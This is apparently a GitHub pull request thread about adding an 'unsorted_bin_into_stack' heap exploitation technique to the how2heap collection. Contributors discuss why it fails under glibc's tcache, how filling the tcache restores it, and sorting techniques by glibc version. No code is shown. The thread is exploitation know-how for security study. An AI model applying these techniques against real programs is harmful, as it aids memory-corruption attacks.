Add unsorted_bin_into_stack

[insuyun]

It adds another attack that returns nearly-arbitrary pointer.
It is similar to house of lore, but it overwrites unsorted bin and simpler.
I tested it with Ubuntu 16.04.

[m1ghtym0]

This attack does not work on the latest glibc anymore, because the freed chunk will not end up in the unsorted bin, but in the tcache instead. When reallocated the size of the chunk in the tcache will not be checked again, so the modification is irrelevant (in this step).
Of course the tcache is basically reducing security checks here, but in that case it destroys the particular attack vector.

@zardus We should think about a structure in this repo that differentiates attacks based on the glibc version. Or even hierarchical for different libcs like: libc -> version -> attack

[insuyun]

True. This is not working in latest glibc.
But it does not prevent from the attack, but it's due to the change of its data structure.
Currently, most of techniques in how2heap are tested in Ubuntu 14.04 or 16.04.
This attack also works in the version, so I think it's fine to add this.

Also, I agree with that it's better to maintain this by glibc versions.
For example, current house of orange is broken due to the glibc patch.
Also, we can do the other attacks related to tcache as you mentioned.

[zardus]

I like the idea of splitting things up by libc version (and libc variant), especially with what's coming soon.

[bennofs]

You should still be able to make this attack work by filling up the tcache first as after the tcache is full, chunks still go into the unsorted bin. In fact, I think any attack that works without tcache can work with tcache but you may need to do a lot of mallocs/frees in between to fill/clear the tcache.

[insuyun]

If we have tcache, I think we can use tcache_poisoning instead of this one.

[m1ghtym0]

That is correct, we could basically add code that fills the cache layer and thereby get the old behavior.Imho this would make it harder to understand the original idea so we'll add some structure to differentiate between libc versions soon. On May 27, 2018 6:50 AM, Benno Fünfstück <notifications@github.com> wrote:You should still be able to make this attack work by filling up the tcache first as after the tcache is full, chunks still go into the unsorted bin. In fact, I think any attack that works without tcache can work with tcache but you may need to do a lot of mallocs/frees in between to fill/clear the tcache. —You are receiving this because you commented.Reply to this email directly, view it on GitHub, or mute the thread.

[insuyun]

Thanks. Maybe we need to maintain based on version for these techniques.

[m1ghtym0]

Thank you!
I'm gonna build smth. this weekend